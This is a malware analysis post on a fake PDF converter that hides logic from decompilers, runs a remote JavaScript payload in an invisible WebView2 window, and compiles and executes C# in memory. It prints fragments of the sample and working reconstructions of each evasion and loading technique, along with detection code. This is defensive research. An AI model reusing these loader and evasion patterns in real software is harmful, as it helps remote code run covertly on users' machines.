
.NET in JavaScript, Fake PDF Converter

1. Overview

I found a site that distributes a curious PDF converter. The executable file distributed at this site appears to be malicious and has several interesting features.
・ .NET Anti-Analysis
・ Execution of external JavaScript payload with WebView2
・ .NET object manipulation from JavaScript code

This post describes these techniques. The execution flow of this executable is shown below.

2. .NET Anti-Analysis

PdfConverters.exe analyzed in this article was created with .NET Core. .NET Core allows developers to bundle the runtime and all libraries into a single executable file (self-contained single-file publishing). This executable therefore contains a number of files, which are extracted at execution time into a folder under %TEMP%\PdfConverters. For analysis this is convenient: the unbundled DLLs can simply be collected from that folder after the sample has run. A good way to learn the role of these files is to look at [AppName].deps.json. app.deps.json reveals that the main functionality of this executable lives in app.dll.

[app.deps.json]
...
      "app/1.0.0": {
        "dependencies": {
          "Microsoft.CodeAnalysis.CSharp": "3.4.0",
          "Microsoft.Management.Infrastructure": "2.0.0",
          "Microsoft.Web.WebView2": "1.0.1823.32",
          "NETStandard.Library": "2.0.3",
          "Newtonsoft.Json": "13.0.3",
          "runtimepack.Microsoft.NETCore.App.Runtime.win-x86": "3.1.32",
          "runtimepack.Microsoft.WindowsDesktop.App.Runtime.win-x86": "3.1.32"
        },
        "runtime": {
          "app.dll": {}
        }
      },
 ...

Analysis of app.dll with dnSpy showed that it does not have many methods. However, one method's execution flow was obfuscated: the flow of the InitializeAsync method is hard to follow, because the nested type <InitializeAsync>d__1 is not decompiled properly.

For objects the decompiler cannot recover, dnSpy's IL view is useful. There I found that <InitializeAsync>d__1 implements the MoveNext and SetStateMachine methods, i.e. it is the attacker's own hand-written implementation of the System.Runtime.CompilerServices.IAsyncStateMachine interface (the type the C# compiler normally generates for an async method).

AsyncVoidMethodBuilder.Start takes a System.Runtime.CompilerServices.IAsyncStateMachine implementation as its argument. Instead of letting the compiler emit that state machine, the attacker writes it by hand and passes it to AsyncVoidMethodBuilder.Start. Because the decompiler only folds compiler-generated state machines back into a readable async method, the body of MoveNext is hidden from dnSpy's decompiled output, while the runtime still executes it through AsyncVoidMethodBuilder.Start. The IL of MoveNext is still present in the assembly, so the IL view (or reading the state machine type directly) is the way to recover the real logic.

https://learn.microsoft.com/en-us/dotnet/api/system.runtime.compilerservices.asyncvoidmethodbuilder.start?view=net-7.0
https://learn.microsoft.com/en-us/dotnet/api/system.runtime.compilerservices.iasyncstatemachine?view=net-7.0
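To make the trick concrete, here is an added example (written for this post, not code from the sample) of an async-void method whose state machine is written by hand rather than generated by the compiler. The names HiddenStateMachine and InitializeAsync are placeholders. The runtime drives MoveNext through AsyncVoidMethodBuilder.Start exactly as it does for compiler-generated code, but a decompiler that looks for the compiler's naming and attribute pattern will not fold the MoveNext body back into InitializeAsync.

```csharp
using System;
using System.Runtime.CompilerServices;
using System.Threading;
using System.Threading.Tasks;

// Added example: a hand-rolled IAsyncStateMachine. The C# compiler normally
// emits a type like this (named <InitializeAsync>d__N) for every async method;
// writing it by hand keeps the real logic out of the decompiled InitializeAsync.
struct HiddenStateMachine : IAsyncStateMachine
{
    public AsyncVoidMethodBuilder Builder;
    public int State;          // -1 = running, 0 = suspended on the delay, -2 = finished
    TaskAwaiter _awaiter;      // awaiter kept across the suspension

    public void MoveNext()
    {
        try
        {
            TaskAwaiter awaiter;
            if (State == 0)
            {
                // Resumed after the await: pick up the stored awaiter.
                awaiter = _awaiter;
                _awaiter = default;
                State = -1;
            }
            else
            {
                Console.WriteLine("stage 1: runs before the await");
                awaiter = Task.Delay(50).GetAwaiter();
                if (!awaiter.IsCompleted)
                {
                    // Suspend: store the awaiter and ask the builder to call MoveNext again later.
                    State = 0;
                    _awaiter = awaiter;
                    Builder.AwaitUnsafeOnCompleted(ref awaiter, ref this);
                    return;
                }
            }
            awaiter.GetResult();
            Console.WriteLine("stage 2: the real logic would live here");
        }
        catch (Exception ex)
        {
            State = -2;
            Builder.SetException(ex);
            return;
        }
        State = -2;
        Builder.SetResult();
    }

    public void SetStateMachine(IAsyncStateMachine stateMachine)
    {
        Builder.SetStateMachine(stateMachine);
    }
}

static class Program
{
    // A decompiler shows only this builder plumbing for the method;
    // the body that matters is HiddenStateMachine.MoveNext.
    static void InitializeAsync()
    {
        var sm = new HiddenStateMachine
        {
            Builder = AsyncVoidMethodBuilder.Create(),
            State = -1
        };
        sm.Builder.Start(ref sm);   // runtime calls sm.MoveNext()
    }

    static void Main()
    {
        InitializeAsync();
        Thread.Sleep(500);          // async void: give the continuation time to finish
    }
}
```

When reversing such a sample, the hint is a type that implements IAsyncStateMachine but is not tagged with the compiler's AsyncStateMachineAttribute or naming scheme; the MoveNext of that type is the method to read.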

3. Execution of external JavaScript payload with WebView2

PdfConverters.exe uses the WebView2 library for external communication. WebView2 is a control that lets .NET (and native) applications embed and drive the Microsoft Edge (Chromium) rendering engine.
https://learn.microsoft.com/en-us/microsoft-edge/webview2/

This executable navigates to https://www.pdfconvertercompare[.]com/main using WebView2. Why would malware open an external page in a browser? The usual reason is to show the user a decoy page, and in fact this URL serves a legitimate application.
However, the WebView2 control was run in an invisible window. It must therefore have a role other than a decoy.

Looking at https://www.pdfconvertercompare[.]com/main, I noticed the main.js script. Even though the window is invisible, main.js is loaded and executed, because the page is rendered by the embedded Edge engine.

It is well known that the browser sandbox makes it difficult for JavaScript to affect the host OS, so at first sight this approach does not seem to make sense; the next section shows how the sample gets around that.
If the JavaScript execution does pay off, it makes the Blue Team's job harder: the external communication is not sent by PdfConverters.exe but by the legitimate WebView2 runtime process (msedgewebview2.exe), using the normal Edge network stack. This makes detection by EDR and creation of IPS/IDS signatures difficult. The link is not completely lost, though: the runtime process is spawned as a child of the host application and carries the host's name on its command line (the --webview-exe-name argument), so the process tree and command line are where to look.
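As an added example of that check (written for this post, not part of the sample or of any product), the following enumerates WebView2 runtime processes on a Windows host and prints the parent process and command line of each, so that a WebView2 instance spawned by an unexpected executable stands out. It assumes the System.Management NuGet package for the WMI query; the Win32_Process class and its ProcessId, ParentProcessId and CommandLine properties are standard WMI.

```csharp
using System;
using System.Diagnostics;
using System.Management;

// Added example: list WebView2 runtime processes with the executable that spawned them.
public static class WebView2Hunter
{
    public static void Main()
    {
        // Win32_Process exposes the parent PID and full command line, which
        // Process.GetProcesses() alone does not give us.
        using var searcher = new ManagementObjectSearcher(
            "SELECT ProcessId, ParentProcessId, CommandLine FROM Win32_Process " +
            "WHERE Name = 'msedgewebview2.exe'");

        foreach (ManagementObject proc in searcher.Get())
        {
            uint pid = (uint)proc["ProcessId"];
            uint ppid = (uint)proc["ParentProcessId"];
            string cmd = proc["CommandLine"] as string ?? "";

            string parentName;
            try
            {
                parentName = Process.GetProcessById((int)ppid).ProcessName;
            }
            catch (ArgumentException)
            {
                // Parent already exited; the --webview-exe-name argument in cmd still names it.
                parentName = "<exited>";
            }

            Console.WriteLine($"pid={pid} parent={parentName} ({ppid})");
            Console.WriteLine("  " + cmd);
        }
    }
}
```

Any WebView2 runtime whose parent is not a known WebView2-hosting application (Office, Teams, Widgets, installers and the like) deserves a look, and the same two fields are what an EDR rule on process creation would key on.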

4. .NET object manipulation from JavaScript code

WebView2 not only allows controlling Microsoft Edge from .NET, but also manipulating .NET objects from JavaScript executed in the embedded browser. This executable creates an object of the api class and passes it to the AddHostObjectToScript method, which exposes that object (its methods and properties) to the page's JavaScript.

https://learn.microsoft.com/en-us/microsoft-edge/webview2/how-to/hostobject?tabs=win32
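The following is an added illustration (written for this post, not the sample's code) of the two building blocks from sections 3 and 4 together: a WebView2 control hosted in a window the user never sees, navigating to a page whose script calls back into a .NET object registered with AddHostObjectToScript. The decoy page content, the class name Api and its Echo method are stand-ins; the real sample navigated to the external site and loaded main.js instead. It assumes a Windows Forms project referencing the Microsoft.Web.WebView2 NuGet package and a WebView2 runtime installed on the machine.

```csharp
using System;
using System.Runtime.InteropServices;
using System.Threading.Tasks;
using System.Windows.Forms;
using Microsoft.Web.WebView2.WinForms;

// Added example. The object handed to AddHostObjectToScript must be COM visible;
// WebView2 exposes it to page script through IDispatch.
[ComVisible(true)]
[ClassInterface(ClassInterfaceType.AutoDual)]
public class Api
{
    // Placeholder method. In the sample the equivalent method (LC) compiled and
    // ran C# source received from JavaScript.
    public string Echo(string text) => "host received: " + text;
}

public class HiddenHost : Form
{
    readonly WebView2 _web = new WebView2();

    // Constructed decoy page: its script calls the host object and reports back.
    const string Page = @"<html><body>decoy<script>
(async () => {
  const api = chrome.webview.hostObjects.api;      // proxy for the .NET Api object
  const reply = await api.Echo('hello from JS');   // runs Api.Echo inside the host process
  chrome.webview.postMessage(reply);               // hand the result back to .NET
})();
</script></body></html>";

    public HiddenHost()
    {
        // Keep the browser invisible: no taskbar entry, no border, fully transparent.
        ShowInTaskbar = false;
        FormBorderStyle = FormBorderStyle.None;
        Opacity = 0;
        Controls.Add(_web);
        Load += async (_, __) => await StartAsync();
    }

    async Task StartAsync()
    {
        await _web.EnsureCoreWebView2Async();
        // Reachable from page script as chrome.webview.hostObjects.api
        _web.CoreWebView2.AddHostObjectToScript("api", new Api());
        _web.CoreWebView2.WebMessageReceived += (_, e) =>
        {
            Console.WriteLine(e.TryGetWebMessageAsString());
            Application.Exit();
        };
        // The sample navigated to an external URL here; an inline page keeps this runnable offline.
        _web.CoreWebView2.NavigateToString(Page);
    }

    [STAThread]
    static void Main()
    {
        Application.Run(new HiddenHost());
    }
}
```

Everything the page script can reach through chrome.webview.hostObjects runs with the privileges of the host process, outside the browser sandbox; the sandbox only constrains what the script can do on its own, not what the host chooses to expose.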

main.js uses the api object to execute C# code. The object registered under the name api is reachable as chrome.webview.hostObjects.api in JavaScript (calls through this proxy are asynchronous and return promises). The following JavaScript calls the LC method with C# source code as part of its argument.
...
    try {
      x = chrome.webview.hostObjects.api
    } catch (G9) {}
...
    c = '\nusing System;\nusing System.Diagnostics;\n ...'  //C# Code
...
    v6 = x.LC
...
    var Gf = {
                a: j,
                s: J,
                c: vp,
                d: vL,
                r: vV,
              }
    var GS = JSON.stringify(Gf)
    await vz('8 - before load install search/show overlay assembly')
    var GC = await v6(GS, 'a', 's', 'c', 'd', 'r')  //Execute api.LC method
 ...

The LC method of the api class compiles and executes the given C# code. The type names and method names needed for this operation (the Roslyn and runtime APIs) are supplied from JavaScript inside the JSON argument and resolved by reflection, so none of them is hard-coded in the .NET code; the string parameters (ank, sk, ...) are merely the JSON keys under which they are found. The cad dictionary acts as a cache keyed on the payload identifier, so a payload already compiled is not compiled twice.
public bool LC(string ja, string ank, string sk, string rck, string rdk, string rfk)
{
    JObject jobject = JObject.Parse(ja);
    string text = (string)jobject[ank];           // payload identifier
    if (this.cad.ContainsKey(text))
    {
        return true;                               // already compiled
    }
    string text2 = (string)jobject[sk];            // C# source code
    MemoryStream memoryStream = new MemoryStream();
...
    string path = (string)Type.GetType((string)jarray4[0]).GetMethod((string)jarray4[1][0][0]).Invoke(null, null); // System.Runtime.InteropServices.RuntimeEnvironment.GetRuntimeDirectory
...
    SyntaxTree syntaxTree = (SyntaxTree)type.GetMethod((string)jarray5[1][0][0], types).Invoke(null, array2); // Microsoft.CodeAnalysis.CSharp.SyntaxFactory.ParseSyntaxTree
...
    object obj = type2.GetMethod((string)jarray6[1][0][0], types).Invoke(null, array2); // Microsoft.CodeAnalysis.CSharp.CSharpCompilation.Create
...
    obj = method.Invoke(obj, new object[]          // execute compiled C# code
    {
        obj2
    });
...
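As an added example (my own reconstruction of the pattern, not the decompiled sample), the following does with direct API calls what LC does through names resolved from JSON: parse the source with Roslyn, compile it into an in-memory assembly referenced against the running runtime's directory, load it from bytes and invoke a static method. The type name Payload, the method Hello and the reference list are assumptions; it assumes the Microsoft.CodeAnalysis.CSharp NuGet package, the same dependency listed in app.deps.json.

```csharp
using System;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Runtime.InteropServices;
using Microsoft.CodeAnalysis;
using Microsoft.CodeAnalysis.CSharp;
using Microsoft.CodeAnalysis.Emit;

// Added example: the compile-in-memory-and-invoke pattern behind api.LC.
public static class InMemoryCompiler
{
    public static Assembly Compile(string source, string assemblyName)
    {
        // Same call the sample resolves by reflection: where the runtime's DLLs live.
        string runtimeDir = RuntimeEnvironment.GetRuntimeDirectory();
        var references = new[] { "System.Private.CoreLib.dll", "System.Runtime.dll", "System.Console.dll" }
            .Select(f => MetadataReference.CreateFromFile(Path.Combine(runtimeDir, f)));

        SyntaxTree tree = SyntaxFactory.ParseSyntaxTree(source);
        CSharpCompilation compilation = CSharpCompilation.Create(
            assemblyName,
            new[] { tree },
            references,
            new CSharpCompilationOptions(OutputKind.DynamicallyLinkedLibrary));

        // Emit to memory only; no payload DLL is written to disk.
        using var ms = new MemoryStream();
        EmitResult result = compilation.Emit(ms);
        if (!result.Success)
        {
            var errors = result.Diagnostics.Where(d => d.Severity == DiagnosticSeverity.Error);
            throw new InvalidOperationException(string.Join(Environment.NewLine, errors));
        }
        return Assembly.Load(ms.ToArray());
    }

    public static object Invoke(Assembly assembly, string typeName, string methodName, params object[] args)
    {
        Type type = assembly.GetType(typeName) ?? throw new TypeLoadException(typeName);
        MethodInfo method = type.GetMethod(methodName) ?? throw new MissingMethodException(typeName, methodName);
        return method.Invoke(null, args);
    }

    public static void Main()
    {
        // Constructed payload source, standing in for the C# text that main.js delivers.
        const string source = @"
using System;
public static class Payload
{
    public static string Hello(string who) => ""hello, "" + who;
}";
        Assembly asm = Compile(source, "payload");
        Console.WriteLine(Invoke(asm, "Payload", "Hello", "world"));
        // An assembly loaded from a byte array has no file behind it, so Location is empty.
        Console.WriteLine("loaded from disk: " + (asm.Location.Length != 0));
    }
}
```

For detection, two things stand out in this pattern: a non-developer application loading Microsoft.CodeAnalysis.CSharp.dll at runtime, and a managed assembly loaded with an empty Location (i.e. from memory rather than from a file) inside that process; both are visible through ETW/CLR module-load telemetry.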

Using the techniques described above, this executable runs an arbitrary C# payload delivered as text from the web page; the compiled assembly is emitted into a MemoryStream rather than a file, so no payload DLL needs to touch disk.
PdfConverters.exe : 3DDFA37D2779149114BFDD3E56EFD6573426628639CC6D7E180AA8F15A85C5A2
